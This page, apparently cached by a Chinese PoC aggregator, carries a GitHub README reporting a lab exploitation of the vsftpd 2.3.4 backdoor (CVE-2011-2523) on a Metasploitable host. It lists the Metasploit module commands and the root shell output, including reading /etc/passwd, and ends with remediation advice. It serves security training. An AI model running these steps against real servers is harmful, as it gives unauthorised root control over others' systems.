POC详情: bdf3b56546e5f9d644c696c013f47ab960fb5fce

来源
关联漏洞
标题: vsftpd 操作系统命令注入漏洞 (CVE-2011-2523)
描述:vsftpd是一款用于类Unix系统的FTP(文件传输协议)服务器。 vsftpd 2.3.4版本(2011年6月30日至2011年7月3日期间下载)中存在安全漏洞,该漏洞源于软件中存在可以打开shell的后门。攻击者可利用该漏洞执行命令。
描述
Vulnerability assessment and exploitation of vsftpd 2.3.4 (CVE-2011-2523) using Metasploit. Full report and proof of root access included.
介绍
# 💥 vsftpd 2.3.4 Backdoor Exploit Report

> Exploitation of a known vulnerability in `vsftpd 2.3.4` using Metasploit.

## 📌 Target Details

- **Target IP:** `192.168.150.133`
- **Service:** FTP  
- **Vulnerable Version:** vsftpd 2.3.4  
- **Exploit Module:** `exploit/unix/ftp/vsftpd_234_backdoor`  
- **Payload:** Command shell (TCP)

---

## 🔍 Vulnerability Summary

`vsftpd 2.3.4` contains a malicious backdoor that opens a command shell on port 6200 when a specially crafted username (ending in `:)`) is received.

> CVE: [CVE-2011-2523](https://nvd.nist.gov/vuln/detail/CVE-2011-2523)

---

## 🚀 Exploitation Steps

```bash
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run
```

### 💥 Shell Access Gained:

```bash
whoami
> root

id
> uid=0(root) gid=0(root)

hostname
> metasploitable

uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...

cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  ...
```

---

## 🔐 Impact

Root shell access gives the attacker full control over the target system — including privilege escalation, lateral movement, data exfiltration, and persistent access.

---

## ✅ Recommendation

- **Do NOT use vsftpd 2.3.4.**
- Upgrade to a secure, supported version.
- Restrict external access to FTP.
- Monitor suspicious traffic on port 6200.

---

## 📄 Report

📝 Full PDF report available in this repo: [vsftpd-exploit-report.pdf](./vsftpd-exploit-report.pdf)

---

## 📚 References

- [Rapid7 Module Info](https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/)
- [CVE-2011-2523 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2011-2523)

---

## 👨‍💻 Author

Made with 🔥 by [vedpakhare](https://github.com/vedpakhare)
文件快照

[4.0K] /data/pocs/bdf3b56546e5f9d644c696c013f47ab960fb5fce ├── [1.7K] README.md └── [ 65K] vsftpd-exploit-report.pdf 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。